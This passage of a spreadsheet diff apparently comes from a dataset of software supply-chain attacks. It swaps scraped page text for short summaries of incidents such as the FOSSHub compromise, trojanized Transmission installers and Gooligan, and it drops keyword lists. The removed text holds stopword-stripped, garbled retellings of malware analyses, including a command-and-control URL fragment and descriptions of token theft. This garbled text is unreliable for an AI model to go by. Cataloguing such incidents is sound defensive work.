solved within digitalocean take servers botnet destroyed rather malware operators lose control machines technically remain infected malware defused still that’s patched vulnerability machines drop ocean compared size internet still decent catch prevent future want offer conclusion everyone stay clear browser extensions they’re still immensely useful actually make safer browsing experience https everywhere ublock origin lastpass said malware always risk offer thirdparty software high levels permissions like propose ideas could help reduce risk google could start restoring trust trustworthy extensions would manually verify extensions reputation developer open source also great restoring trust extension open source maybe could warrant badge there’s still problem whether open source code what’s served extension ways solving head suggest github integration automatically builds publishes latest version code marks “verified opensource” let’s forget fing google we’re talking static code analysis automatic suggestion fixes 86tb repository don’t tell they’re unable detect blatant malware 20kb chrome extension fact current malware detection chrome webstore joke currently takes around download payload installation rather shipping case years doesn’t seem like google much offer 5digit bounties vulnerabilities chrome leave glaring hole virtually unguarded current state affairs dismal chrome webstore report abusive extension fact ones least users taken testament ineffective anyone google reading chrome webstore it’s largest single threats right addendum harris works chrome tells blacklisted extensions actually removed computers installed maximekjaer extensions blacklisted chrome store automatically removed users installed harris parityzero july that’s good news means users question aren’t infected anymore provides easier efficient shutting botnet view edit history view discussion hacker news back please enable javascript view comments powered disqus twitter feed source</t>
+          <t>Malicious age verification Chrome extensions: viralands.com</t>
         </is>
       </c>
       <c r="D33" t="inlineStr">
         <is>
           <t>https://kjaer.io/extension-malware</t>
-        </is>
-      </c>
-      <c r="E33" t="inlineStr">
-        <is>
-          <t>['output', 'blog', 'maxime', 'chrome', 'extension', 'browser', 'central', 'role', 'app', 'intimate', 'datum', 'online', 'service', 'amazon', 'gmail', 'online', 'service', 'online', 'service', 'diligence', 'site', 'twofactor', 'authentication', 'weak', 'link', 'extension', 'impair', 'measure', 'people', 'unaware', 'attack', 'vector', 'browser', 'extension', 'unregulated', 'territory', 'inherent', 'limit', 'little', 'protection', 'extension', 'malware', 'malware', 'extension', 'friend', 'publishing', 'code', 'help', 'malware', 'show', 'malware', 'function', 'extract', 'code', 'post', 'liberty', 'line', 'irrelevant', 'point', 'facebook', 'news', 'feed', 'friend', 'weird', 'lewd', 'clickbaity', 'link', 'content', 'uncommon', 'facebook', 'case', 'pattern', 'friend', 'type', 'link', 'comment', 'page', 'weird', 'single', 'post', 'page', 'time', 'post', 'friend', 'comment', 'friend', 'smart', 'ton', 'crap', 'content', 'rabbit', 'hole', 'link', 'huge', 'mistake', 'message', 'verify', 'content', 'semiraunchy', 'nature', 'content', 'seem', 'justified', 'fact', 'verification', 'chrome', 'extension', 'chrome', 'extension', 'order', 'extension', 'website', 'viralandscom', 'quick', 'search', 'extension', 'identical', 'extension', 'extension', 'total', 'user', 'identical', 'extension', 'viraland', 'chrome', 'webstore', 'look', 'extension', 'code', 'facade', 'utility', 'extension', 'suspicious', 'good', 'good', 'place', 'start', 'extension', 'manifest', 'file', 'manifestjson', 'metadata', 'file', 'information', 'extension', 'name', 'description', 'version', 'number', 'permission', 'permission', 'script', 'idea', 'extension', 'extension', 'permission', 'permission', 'storage', 'tab', 'webnavigation', 'alarm', 'extension', 'chrome', 'permission', 'viral', 'content', 'verify', 'datum', 'website', 'awful', 'extension', 'check', 'manifest', 'file', 'find', 'line', 'background', 'script', 'persistent', 'true', 'contentsecuritypolicy', 'self', 'script', 'able', 'datum', 'store', 'code', 'script', 'backgroundjs', 'validity', 'suspicion', 'verification', 'fake', 'backgroundjs', 'script', 'short', 'thing', 'extension', 'popup', 'popup', 'simple', 'html', 'form', 'birthday', 'press', 'cool', 'extension', 'verification', 'page', 'interesting', 'story', 'document', 'queryselector', 'function', 'document', 'queryselector', 'true', 'document', 'queryselector', 'loading', 'false', 'settimeout', 'function', 'document', 'queryselector', 'loading', 'true', 'document', 'queryselector', 'false', 'randomintfrominterval', 'right', 'click', 'display', 'loading', 'idle', 'random', 'amount', 'time', 'verification', 'dummy', 'hiding', 'extension', 'script', 'remote', 'payload', 'script', 'much', 'interest', 'copy', 'package', 'line', 'surprise', 'little', 'write', 'sentence', 'first', 'line', 'eyestriking', 'line', 'http104131351369999jsnewphpid22', 'variable', 'external', 'server', 'fetch', 'script', 'https', 'bonus', 'mitm', 'attack', 'spoiler', 'alert', 'script', 'server', 'extension', 'download', 'ship', 'payload', 'webstore', 'check', 'script', 'server', 'store', 'localstorage', 'querysign', 'true', 'runtime', 'function', 'code', 'response', 'window', 'function', 'code', 'console', 'code', 'exit', 'error', 'catch', 'console', 'error', 'able', 'request', 'formal', 'name', 'externaljs', 'long', 'file', 'clocking', 'line', 'capable', 'instruction', 'external', 'server', 'url', 'externaljs', 'first', 'instruction', 'second', 'report', 'back', 'model', 'instruction', 'server', 'status', 'trick', 'command', 'control', 'short', 'extension', 'instruction', 'server', 'instruction', 'getaction', 'function', 'externaljs', 'function', 'getaction', 'function', 'datum', 'response', 'action', 'data', 'datum', 'action', 'array', 'action', 'length', 'checkfblogin', 'function', 'status', 'handleaction', 'action', 'variable', 'unique', 'identifier', 'machine', 'function', 'generateuid', 'function', 'generateuid', 'array', 'uint32array', 'window', 'array', 'return', 'call', 'array', 'function', 'return', 'join', 'want', 'instruction', 'request', 'server', 'file', 'list', 'action', 'extension', 'undertake', 'instruction', 'action', 'datum', 'vvideosss', 'sense', 'extension', 'access', 'token', 'first', 'action', 'link', 'extension', 'steal', 'access', 'token', 'load', 'link', 'access', 'token', 'extension', 'catch', 'server', 'callback', 'field', 'facebook', 'access', 'token', 'malware', 'account', 'send', 'message', 'status', 'link', 'post', 'page', 'equivalent', 'login', 'credential', 'facebook', 'page', 'instruction', 'extension', 'page', 'vvideosss', 'check', 'page', 'popular', 'page', 'user', 'viraland', 'extension', 'likely', 'page', 'question', 'dodgy', 'provider', 'side', 'note', 'adjective', 'facebook', 'seller', 'like', 'computer', 'pure', 'speculation', 'certain', 'fishy', 'page', 'youtube', 'channel', 'instruction', 'channel', 'code', 'function', 'server', 'extension', 'server', 'current', 'status', 'function', 'function', 'chrome', 'storage', 'local', 'function', 'storage', 'datum', 'storage', 'datum', 'runtime', 'true', 'contenttype', 'querystring', 'console', 'status', 'datum', 'datum', 'thing', 'server', 'unique', 'string', 'machine', 'extension', 'string', 'extension', 'multiple', 'copy', 'extension', 'available', 'chrome', 'webstore', 'malware', 'operator', 'machine', 'facebook', 'malware', 'information', 'judge', 'exact', 'size', 'activity', 'botnet', 'factor', 'value', 'black', 'market', 'much', 'extension', 'lookout', 'version', 'payload', 'change', 'gain', 'capability', 'malware', 'permission', 'change', 'datum', 'website', 'operator', 'total', 'control', 'email', 'login', 'credential', 'mine', 'bitcoin', 'seed', 'content', 'name', 'credit', 'card', 'information', 'local', 'file', 'offlimit', 'consolation', 'viraland', 'extension', 'chrome', 'webstore', 'computer', 'good', 'knowledge', 'extension', 'stay', 'webstore', 'machine', 'network', 'server', 'structure', 'redundancy', 'vulnerable', 'least', 'temporary', 'disconnection', 'server', 'redundancy', 'case', 'server', 'address', 'malware', 'operator', 'control', 'address', 'whole', 'network', 'article', 'note', 'case', 'computer', 'expert', 'command', 'control', 'network', 'mean', 'server', 'internet', 'expert', 'computer', 'network', 'address', 'digitalocean', 'provider', 'site', 'experience', 'abuse', 'digitalocean', 'responsive', 'issue', 'digitalocean', 'take', 'server', 'malware', 'operator', 'control', 'machine', 'vulnerability', 'machine', 'ocean', 'size', 'internet', 'decent', 'catch', 'future', 'conclusion', 'clear', 'browser', 'extension', 'useful', 'safe', 'experience', 'https', 'ublock', 'origin', 'lastpass', 'offer', 'thirdparty', 'software', 'high', 'level', 'permission', 'idea', 'risk', 'trust', 'trustworthy', 'extension', 'extension', 'reputation', 'developer', 'open', 'source', 'great', 'trust', 'extension', 'open', 'source', 'badge', 'problem', 'open', 'source', 'code', 'extension', 'way', 'head', 'integration', 'late', 'version', 'code', 'mark', 'opensource', 'static', 'code', 'analysis', 'automatic', 'suggestion', 'fix', 'repository', 'unable', 'blatant', 'malware', 'chrome', 'extension', 'fact', 'current', 'malware', 'detection', 'chrome', 'webstore', 'joke', 'download', 'payload', 'installation', 'shipping', 'case', 'year', 'much', 'bounty', 'leave', 'hole', 'unguarded', 'current', 'state', 'affair', 'chrome', 'webstore', 'report', 'abusive', 'extension', 'fact', 'one', 'least', 'user', 'testament', 'ineffective', 'google', 'reading', 'chrome', 'webstore', 'large', 'single', 'threat', 'extension', 'computer', 'maximekjaer', 'extension', 'chrome', 'store', 'user', 'good', 'news', 'user', 'question', 'easy', 'efficient', 'view', 'history', 'view', 'discussion', 'hacker', 'news', 'javascript', 'view', 'comment', 'disqus', 'twitter', 'feed', 'source']</t>
         </is>
       </c>
     </row>
@@ -1306,15 +1173,14 @@
           <t>Fosshub</t>
         </is>
       </c>
-      <c r="C34" t="inlineStr"/>
+      <c r="C34" t="inlineStr">
+        <is>
+          <t>Hackers compromised FOSSHub, a popular file hosting service, and replaced the legitimate installer of several applications with malicious copies.</t>
+        </is>
+      </c>
       <c r="D34" t="inlineStr">
         <is>
           <t>https://www.ghacks.net/2016/08/03/attention-fosshub-downloads-compromised/</t>
-        </is>
-      </c>
-      <c r="E34" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1331,7 +1197,7 @@
       </c>
       <c r="C35" t="inlineStr">
         <is>
-          <t>skip navigation transmission home download addons community report developer contributor discussions community forum donate github error page found transmission home download addons community report developer contributor discussions community forum donate github</t>
+          <t>Attackers infected two Transmission v2.92 installers available from the Transmission website with Keydnap, using a valid developer key that was not associated with Transmission.</t>
         </is>
       </c>
       <c r="D35" t="inlineStr">
@@ -1340,11 +1206,6 @@
 https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/</t>
         </is>
       </c>
-      <c r="E35" t="inlineStr">
-        <is>
-          <t>['navigation', 'transmission', 'home', 'download', 'community', 'report', 'developer', 'contributor', 'discussion', 'community', 'forum', 'error', 'page', 'transmission', 'home', 'download', 'addon', 'community', 'report', 'developer', 'contributor', 'discussion', 'community', 'forum']</t>
-        </is>
-      </c>
     </row>
     <row r="36">
       <c r="A36" t="inlineStr">
@@ -1357,15 +1218,14 @@
           <t>Ask.com Toolbar</t>
         </is>
       </c>
-      <c r="C36" t="inlineStr"/>
+      <c r="C36" t="inlineStr">
+        <is>
+          <t>Ask software was being co-opted by a malicious actor to execute malicious software on victim endpoints.</t>
+        </is>
+      </c>
       <c r="D36" t="inlineStr">
         <is>
           <t>https://redcanary.com/blog/ask-partner-network-compromise/</t>
-        </is>
-      </c>
-      <c r="E36" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -1382,17 +1242,12 @@
       </c>
       <c r="C37" t="inlineStr">
         <is>
-          <t>demo contact support search menu choose language english english spanish español french français german deutsch italian italiano portuguese português japanese chinese korean taiwan 繁體中文 solutions cases industry organization size hybrid cloud zero trust least privilege developer operations solutions antiransomware sdwan cases come life check points customer stories learn retail financial services federal government state local government healthcare telco service provider education cases come life check points customer stories learn enterprise small medium business cases come life check points customer stories learn platform infinity platform secure network secure cloud secure workspace operations explore infinity platform overview infinity core services infinity portal access infinity portal infinity platform agreement predictable cybersecurity environments platform agreement aipowered prevention learn explore quantum next generation firewall ngfw gateway industryleading powered gateways modern enterprises sdwan software defined wide area networks converging networking policy management manage firewall policy unified platform onpremises cloud networks operational technology internet things autonomous iotot prevention zerotrust profiling virtual patching segmentation remote access secure seamless remote access corporate networks aipowered prevention learn explore cloudguard cloud network industryleading prevention cloudnative firewalls cloud native application protection platform cloud native prevention first code developer centric code application automated application aipowered prevention learn explore harmony email collaboration email including office collaboration apps endpoint comprehensive endpoint protection prevent attacks data compromise mobile complete protection mobile workforce across mobile devices sase unifying optimized internet network connectivity aipowered prevention learn operations managed prevention response service operations service infinty mdrmpr extended prevention response aipowered clouddelivered operations infinity xdrxpr secure automation collaboration automate response playbooks infinity playblocks unified events logs service infinity events cloudbased analysis monitoring reporting powered teammate automated admin incident response copilot threatcloud brain behind check point’s prevention aipowered prevention learn support services assess transform master respond manage support explore assess services cyber risk assessment assess cyber maturity plan actionable goals penetration testing evaluate defenses potential cyber attacks threats controls analysis nist cist analyze technology gaps plan solutions improved intelligence analyzed data cyber threats aiding proactive measures infinity global services learn hackers inside secrets beat game view courses explore transform services deployment optimization strategic deployment refinement optimal protection advanced technical account management proactive service delivered highly skilled cyber professionals lifecycle management services effectively maintain lifecycle products services infinity global services learn hackers inside secrets beat game view courses explore master services certifications accreditations comprehensive cyber training certification programs ciso training globally recognized training chief information officers awareness empower employees cyber skills work home cyber range simulated gamification environment training mind check point cyber awareness programs training infinity global services learn hackers inside secrets beat game view courses explore respond services incident response manage mitigate incidents systematic response services managed detection response prioritize prevention delivering comprehensive operations service digital forensics comprehensive investigation analysis cyber incidents attacks infinity global services learn hackers inside secrets beat game view courses explore manage services mxdr managed siem managed firewalls agent management managed cnapp managed cspm infinity global services learn hackers inside secrets beat game view courses explore support services support programs programs designed help maximize technology utilization check point proactive monitoring infrastructure program offerings contact support learn hackers inside secrets beat game view courses solutions cases hybrid cloud zero trust least privilege developer operations solutions antiransomware sdwan industy retail financial services federal government state local government healthcare telco service provider education organization size enterprise small medium business platform infinity platform platform overview infinity core services infinity portal infinity platform agreement secure network next generation firewall ngfw gateway sdwan policy management operational technology internet things remote access secure cloud cloud network cloud native application protection platform code application secure workspace email collaboration endpoint mobile sase operations managed prevention response service extended prevention response secure automation collaboration unified events logs service powered teammate threatcloud support services assess cyber risk assessment penetration testing controls analysis nist cist intelligence transform deployment optimization advanced technical account management lifecycle management services master certifications accreditations ciso training awareness cyber range mind respond incident response managed detection response digital forensics manage mxdr managed siem managed firewalls agent management managed cnapp managed cspm support support programs check point contact support partners check point partners find partner channel partners technology partners mssp partners cloud azure cloud become partner overview enrolled partners partner portal check point channel grow business sign company company leadership careers investor relations newsroom learn resource center customer stories blog events webinars cyber cyber insights check point research cyber talk executives checkmates community cases come life check points customer stories learn search search menu choose language english english spanish español french français german deutsch italian italiano portuguese português japanese chinese korean taiwan 繁體中文 toggle navigation blog home research million google accounts breached gooligan filter select category research securing cloud harmony company culture innovation customer stories horizon securing network partners connect sase harmony email artificial intelligence infinity global services crypto healthcare harmony sase research november million google accounts breached gooligan check point research team share result hard work done research teams revealed today alarming malware campaign attack campaign named gooligan breached million google accounts number continues rise additional breached devices research exposes malware roots infected devices steals authentication tokens used access data google play gmail google photos google docs suite google drive gooligan variant android malware campaign found researchers snappea last year check point reached google team immediately information campaign researchers working closely google investigate source gooligan campaign “we’re appreciative check point’s research partnership we’ve worked together understand issues” said adrian ludwig google’s director android part ongoing efforts protect users ghost push family malware we’ve taken numerous steps protect users improve android ecosystem overall” click read adrian ludwig’s complete statement gooligan encouraged statement google shared addressing issue chosen join forces continue investigation around gooligan google also stated taking numerous steps including proactively notifying affected accounts revoking affected tokens deploying safetynet improvements protect users apps future following sections provide answers regarding campaign affected gooligan potentially affects devices android jelly bean kitkat lollipop inmarket devices today devices located asia europe research identified tens fake applications infected malware you’ve downloaded apps listed appendix might infected review application list “settings apps” find applications please consider downloading antivirus product check point zonealarm check indeed infected noticed hundreds email addresses associated enterprise accounts worldwide know google account breached check account compromised accessing following site created httpsgooligancheckpointcom account breached following steps required clean installation operating system mobile device required process called “flashing” complex process recommend powering device approaching certified technician mobile service provider request device “reflashed” change google account passwords immediately process android devices become infected found traces gooligan malware code dozens legitimatelooking apps thirdparty android stores stores attractive alternative google play many apps free offer free versions paid apps however stores apps sell aren’t always verified gooliganinfected apps also installed using phishing scams attackers broadcast links infected apps unsuspecting users messaging services gooligan emerge researchers first encountered gooligan’s code malicious snappea last year time malware reported several vendors attributed different malware families like ghostpush monkeytest xinyinhe late malware’s creators gone mostly silent summer malware reappeared complex architecture injects malicious code android system processes change malware works today help finance campaign fraudulent activity malware simulates clicks advertisements provided legitimate networks forces install device attacker paid network apps installed successfully logs collected check point researchers show every gooligan installs least apps fraudulently breached devices million apps since campaign began gooligan work infection begins user downloads installs gooliganinfected vulnerable android device research team found infected apps thirdparty stores could also downloaded android users directly tapping malicious links phishing attack messages infected installed sends data device campaign’s command control server gooligan downloads rootkit server takes advantage multiple android exploits including wellknown vroot cve20136282 towelroot cve20143153 exploits still plague many devices today patches available versions android patches never installed user rooting successful attacker full control device execute privileged commands remotely achieving root access gooligan downloads malicious module server installs infected device module injects code running google play google mobile services mimic user behavior gooligan avoid detection technique first seen mobile malware hummingbad module allows gooligan steal user’s google email account authentication token information install apps google play rate raise reputation install adware generate revenue servers don’t know whether using service malicious send gooligan names apps download google play installed service pays attacker malware leaves positive review high rating google play using content receives server research team able identify several instances activity crossreferencing data breached devices google play reviews another reminder users shouldn’t rely ratings alone decide whether trust examples reviews left users also found attacker’s records victims example fake reviews comments fraudulent applications user discovered different fraudulent apps installed device without knowledge similar hummingbad malware also fakes device identification information imei imsi download twice seeming like installation happening different device thereby doubling potential revenue apps downloaded google play gooligan google authorization tokens google authorization token access google account related services user issued google user successfully logged account authorization token stolen hacker token access google services related user including google play gmail google docs google drive google photos google implemented multiple mechanisms like twofactorauthentication prevent hackers compromising google accounts stolen authorization token bypasses mechanism allows hackers desired access user perceived already logged conclusion gooligan breached million google accounts believe largest google account breach date working google continue investigation encourage android users validate whether accounts breached appendix list fake apps infected gooligan perfect cleaner demo wifi enhancer snake glapevzvh html5 games demm memory booster แข่งรถสุดโหด stopwatch clear ballsmove004 flashlight free memory booste touch beauty demoad small blue point battery monitor 清理大师 mini shadow crush photo tubajyics good memory booster phone booster settingservice wifi master fruit slots system booster dircet browser funny drops puzzle bubblepet paradise light browser clean master youtube downloader kxservice best wallpapers smart touch light advanced smartfolder youtubeplayer beautiful alarm pronclub detecting instrument calculator speed fast cleaner blue point cakesweety pedometer compass lite fingerprint unlock pornclub combrowserprovider assistive touch cademy onekeylock wifi speed minibooster comsoitouch comfabullacoploudcallernameringtone kiss browser weather chrono marker slots mania multifunction flashlight google hoth5games swamm browser billiards tcashdemo sexy wallpaper wifi accelerate simple calculator daily racing talking comexampleddeo test photo qplay virtual music cloud tagged android ghostpush gmail google google account google docs google drive google photos gooligan mobile malware snappea also like research march hidden risks within ethereum’s create2 function guide navigating blockchain oded vanunu dikla barda roman zaikin digital research march february 2024’s wanted malware wordpress websites targeted fresh fakeupdates campaign researchers uncovered campaign fakeupdates also known research march check point research alerts financially motivated magnet goblin group exploits 1day vulnerabilities target publicly facing servers highlights rapid exploitation 1day vulnerabilities actor research february shadowed menace escalation cyber attacks highlights significant increase attacks first month company careers leadership newsroom investor relations merchandise store contact technical resources user center sign advisories wiki categorization wiki expand learn resource center cyber check point research check point blog customer stories product knowledge center support services support center infinity global service portal contact sales north america international contact support north america international follow deserve best ©1994 check point software technologies rights reserved copyright privacy policy cookie settings latest news</t>
+          <t>Gooligan malware code was included in dozens of legitimate-looking apps on third-party Android app stores.</t>
         </is>
       </c>
       <c r="D37" t="inlineStr">
         <is>
           <t>https://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/</t>
-        </is>
-      </c>
-      <c r="E37" t="inlineStr">
-        <is>
-          <t>['contact', 'support', 'search', 'menu', 'language', 'italian', 'portuguese', 'solution', 'case', 'industry', 'organization', 'size', 'hybrid', 'cloud', 'trust', 'least', 'privilege', 'developer', 'operation', 'solution', 'case', 'life', 'check', 'point', 'customer', 'story', 'retail', 'financial', 'service', 'federal', 'government', 'state', 'local', 'government', 'service', 'provider', 'education', 'case', 'life', 'check', 'point', 'customer', 'story', 'enterprise', 'small', 'medium', 'business', 'case', 'life', 'check', 'point', 'customer', 'story', 'platform', 'infinity', 'platform', 'secure', 'network', 'secure', 'cloud', 'secure', 'workspace', 'operation', 'infinity', 'platform', 'overview', 'infinity', 'core', 'service', 'portal', 'access', 'infinity', 'portal', 'infinity', 'platform', 'agreement', 'predictable', 'cybersecurity', 'environment', 'platform', 'agreement', 'prevention', 'quantum', 'next', 'generation', 'firewall', 'gateway', 'gateway', 'modern', 'enterprise', 'wide', 'area', 'network', 'policy', 'management', 'firewall', 'policy', 'platform', 'operational', 'technology', 'internet', 'thing', 'autonomous', 'iotot', 'prevention', 'zerotrust', 'virtual', 'segmentation', 'remote', 'access', 'secure', 'seamless', 'remote', 'access', 'corporate', 'network', 'prevention', 'prevention', 'cloudnative', 'firewall', 'native', 'application', 'protection', 'platform', 'code', 'developer', 'code', 'application', 'application', 'prevention', 'harmony', 'email', 'collaboration', 'email', 'office', 'collaboration', 'app', 'comprehensive', 'endpoint', 'protection', 'prevent', 'attack', 'datum', 'compromise', 'mobile', 'complete', 'protection', 'mobile', 'workforce', 'mobile', 'device', 'sase', 'unifying', 'internet', 'network', 'connectivity', 'prevention', 'operation', 'prevention', 'response', 'service', 'operation', 'service', 'prevention', 'response', 'clouddelivered', 'operation', 'infinity', 'automation', 'collaboration', 'automate', 'response', 'playbook', 'infinity', 'playblock', 'event', 'log', 'service', 'infinity', 'event', 'analysis', 'monitoring', 'teammate', 'check', 'point', 'prevention', 'prevention', 'support', 'service', 'master', 'manage', 'support', 'assess', 'service', 'cyber', 'risk', 'assessment', 'cyber', 'maturity', 'plan', 'actionable', 'goal', 'penetration', 'testing', 'defense', 'potential', 'cyber', 'attack', 'threat', 'analysis', 'nist', 'cist', 'technology', 'gap', 'solution', 'intelligence', 'datum', 'cyber', 'threat', 'proactive', 'measure', 'infinity', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'transform', 'service', 'deployment', 'optimization', 'strategic', 'deployment', 'refinement', 'optimal', 'protection', 'technical', 'proactive', 'service', 'skilled', 'cyber', 'professional', 'management', 'service', 'lifecycle', 'product', 'service', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'master', 'service', 'certification', 'accreditation', 'comprehensive', 'cyber', 'training', 'certification', 'program', 'ciso', 'training', 'training', 'chief', 'information', 'officer', 'awareness', 'empow', 'employee', 'cyber', 'skill', 'cyber', 'gamification', 'environment', 'training', 'mind', 'check', 'point', 'cyber', 'awareness', 'program', 'infinity', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'respond', 'service', 'incident', 'response', 'mitigate', 'incident', 'systematic', 'response', 'service', 'detection', 'response', 'prioritize', 'prevention', 'comprehensive', 'operation', 'service', 'digital', 'forensic', 'comprehensive', 'investigation', 'analysis', 'cyber', 'incident', 'attack', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'manage', 'service', 'mxdr', 'siem', 'firewall', 'agent', 'management', 'global', 'service', 'hacker', 'secret', 'game', 'view', 'course', 'support', 'service', 'support', 'program', 'program', 'help', 'technology', 'utilization', 'check', 'point', 'proactive', 'monitoring', 'infrastructure', 'program', 'offering', 'contact', 'support', 'hacker', 'secret', 'game', 'view', 'course', 'solution', 'case', 'hybrid', 'cloud', 'trust', 'least', 'privilege', 'developer', 'operation', 'solution', 'financial', 'service', 'federal', 'government', 'state', 'local', 'government', 'service', 'provider', 'education', 'organization', 'size', 'enterprise', 'small', 'medium', 'business', 'platform', 'infinity', 'platform', 'platform', 'overview', 'infinity', 'core', 'service', 'infinity', 'portal', 'infinity', 'platform', 'agreement', 'secure', 'network', 'next', 'generation', 'firewall', 'gateway', 'policy', 'management', 'operational', 'technology', 'internet', 'thing', 'remote', 'access', 'secure', 'application', 'platform', 'code', 'application', 'secure', 'workspace', 'email', 'collaboration', 'endpoint', 'operation', 'prevention', 'response', 'service', 'prevention', 'response', 'automation', 'collaboration', 'event', 'log', 'service', 'teammate', 'service', 'cyber', 'risk', 'assessment', 'penetration', 'testing', 'analysis', 'nist', 'cist', 'intelligence', 'deployment', 'optimization', 'advanced', 'technical', 'account', 'management', 'service', 'master', 'certification', 'accreditation', 'ciso', 'awareness', 'cyber', 'range', 'mind', 'incident', 'response', 'detection', 'response', 'digital', 'forensic', 'mxdr', 'firewall', 'agent', 'management', 'support', 'support', 'program', 'point', 'contact', 'support', 'partner', 'point', 'partner', 'partner', 'channel', 'partner', 'technology', 'partner', 'partner', 'overview', 'partner', 'partner', 'portal', 'check', 'point', 'channel', 'business', 'sign', 'company', 'company', 'leadership', 'career', 'investor', 'relation', 'newsroom', 'resource', 'center', 'customer', 'story', 'blog', 'event', 'cyber', 'cyber', 'insight', 'point', 'research', 'cyber', 'talk', 'executive', 'community', 'case', 'life', 'check', 'point', 'customer', 'story', 'search', 'search', 'menu', 'language', 'italian', 'portuguese', 'blog', 'home', 'research', 'account', 'filter', 'select', 'category', 'research', 'company', 'innovation', 'customer', 'story', 'network', 'partner', 'sase', 'harmony', 'email', 'artificial', 'intelligence', 'infinity', 'global', 'service', 'account', 'check', 'point', 'research', 'team', 'share', 'result', 'hard', 'work', 'research', 'team', 'today', 'malware', 'campaign', 'attack', 'campaign', 'account', 'number', 'additional', 'breached', 'device', 'research', 'malware', 'root', 'device', 'authentication', 'token', 'access', 'datum', 'google', 'play', 'gmail', 'photo', 'variant', 'researcher', 'last', 'year', 'check', 'point', 'team', 'information', 'campaign', 'researcher', 'source', 'campaign', 'appreciative', 'check', 'point', 'research', 'partnership', 'issue', 'director', 'part', 'ongoing', 'effort', 'user', 'ghost', 'family', 'malware', 'numerous', 'step', 'user', 'ecosystem', 'click', 'complete', 'statement', 'issue', 'join', 'force', 'investigation', 'numerous', 'step', 'affected', 'account', 'token', 'safetynet', 'improvement', 'user', 'app', 'future', 'section', 'answer', 'campaign', 'device', 'inmarket', 'device', 'today', 'device', 'ten', 'fake', 'application', 'malware', 'app', 'appendix', 'review', 'application', 'list', 'setting', 'app', 'application', 'antivirus', 'product', 'check', 'point', 'check', 'hundred', 'email', 'address', 'enterprise', 'account', 'check', 'account', 'site', 'step', 'clean', 'installation', 'operating', 'system', 'mobile', 'device', 'process', 'complex', 'process', 'device', 'technician', 'mobile', 'service', 'provider', 'request', 'device', 'reflashed', 'change', 'account', 'password', 'device', 'dozen', 'app', 'android', 'store', 'store', 'attractive', 'alternative', 'google', 'many', 'app', 'free', 'free', 'version', 'app', 'store', 'app', 'app', 'phishing', 'scam', 'attacker', 'broadcast', 'link', 'app', 'user', 'service', 'researcher', 'malicious', 'snappea', 'last', 'year', 'time', 'several', 'vendor', 'different', 'malware', 'family', 'xinyinhe', 'creator', 'silent', 'summer', 'malware', 'complex', 'architecture', 'malicious', 'code', 'android', 'system', 'process', 'change', 'malware', 'work', 'today', 'finance', 'campaign', 'fraudulent', 'activity', 'malware', 'click', 'advertisement', 'legitimate', 'network', 'force', 'device', 'attacker', 'network', 'app', 'check', 'point', 'researcher', 'install', 'least', 'app', 'device', 'app', 'campaign', 'work', 'infection', 'user', 'download', 'install', 'vulnerable', 'device', 'research', 'team', 'infected', 'app', 'thirdparty', 'store', 'user', 'malicious', 'link', 'attack', 'message', 'data', 'device', 'campaign', 'command', 'rootkit', 'server', 'advantage', 'multiple', 'android', 'exploit', 'exploit', 'many', 'device', 'today', 'available', 'version', 'patch', 'user', 'successful', 'attacker', 'full', 'control', 'device', 'privileged', 'command', 'root', 'access', 'malicious', 'module', 'server', 'device', 'module', 'code', 'service', 'user', 'behavior', 'detection', 'technique', 'mobile', 'module', 'user', 'email', 'account', 'authentication', 'token', 'information', 'install', 'app', 'google', 'play', 'rate', 'raise', 'reputation', 'adware', 'revenue', 'server', 'service', 'malicious', 'name', 'app', 'play', 'service', 'attacker', 'positive', 'review', 'high', 'rating', 'google', 'play', 'content', 'server', 'research', 'team', 'able', 'several', 'instance', 'activity', 'datum', 'breached', 'device', 'play', 'review', 'reminder', 'user', 'rating', 'trust', 'example', 'review', 'user', 'attacker', 'record', 'victim', 'fake', 'review', 'fraudulent', 'application', 'user', 'different', 'fraudulent', 'app', 'device', 'knowledge', 'similar', 'hummingbad', 'malware', 'device', 'identification', 'information', 'installation', 'different', 'device', 'potential', 'revenue', 'app', 'token', 'account', 'service', 'user', 'user', 'account', 'authorization', 'token', 'hacker', 'service', 'user', 'gmail', 'photo', 'multiple', 'mechanism', 'twofactorauthentication', 'hacker', 'account', 'authorization', 'token', 'bypass', 'mechanism', 'hacker', 'access', 'user', 'conclusion', 'account', 'large', 'account', 'date', 'investigation', 'user', 'account', 'appendix', 'list', 'fake', 'app', 'perfect', 'clean', 'demo', 'wifi', 'enhancer', 'snake', 'glapevzvh', 'game', 'memory', 'booster', 'flashlight', 'free', 'memory', 'booste', 'touch', 'beauty', 'demoad', 'small', 'blue', 'point', 'battery', 'monitor', 'shadow', 'crush', 'photo', 'good', 'memory', 'booster', 'phone', 'booster', 'settingservice', 'wifi', 'master', 'fruit', 'slot', 'system', 'booster', 'downloader', 'kxservice', 'good', 'wallpaper', 'smart', 'touch', 'light', 'advanced', 'smartfolder', 'beautiful', 'alarm', 'pronclub', 'instrument', 'calculator', 'clean', 'blue', 'point', 'cakesweety', 'pedometer', 'compass', 'lite', 'fingerprint', 'unlock', 'pornclub', 'combrowserprovider', 'assistive', 'touch', 'cademy', 'wifi', 'speed', 'minibooster', 'marker', 'mania', 'multifunction', 'flashlight', 'sexy', 'wallpaper', 'wifi', 'simple', 'calculator', 'racing', 'comexampleddeo', 'test', 'photo', 'qplay', 'virtual', 'music', 'cloud', 'gmail', 'photo', 'research', 'risk', 'ethereum', 'create2', 'function', 'guide', 'digital', 'malware', 'website', 'fresh', 'fakeupdate', 'campaign', 'researcher', 'campaign', 'fakeupdate', 'research', 'check', 'point', 'research', 'motivated', 'magnet', 'group', 'vulnerability', 'target', 'server', 'rapid', 'exploitation', 'actor', 'research', 'menace', 'escalation', 'cyber', 'attack', 'significant', 'increase', 'attack', 'first', 'month', 'company', 'career', 'leadership', 'newsroom', 'investor', 'relation', 'merchandise', 'store', 'contact', 'technical', 'resource', 'user', 'center', 'sign', 'advisory', 'wiki', 'categorization', 'wiki', 'resource', 'center', 'cyber', 'check', 'point', 'research', 'check', 'point', 'blog', 'customer', 'story', 'product', 'knowledge', 'center', 'support', 'service', 'support', 'center', 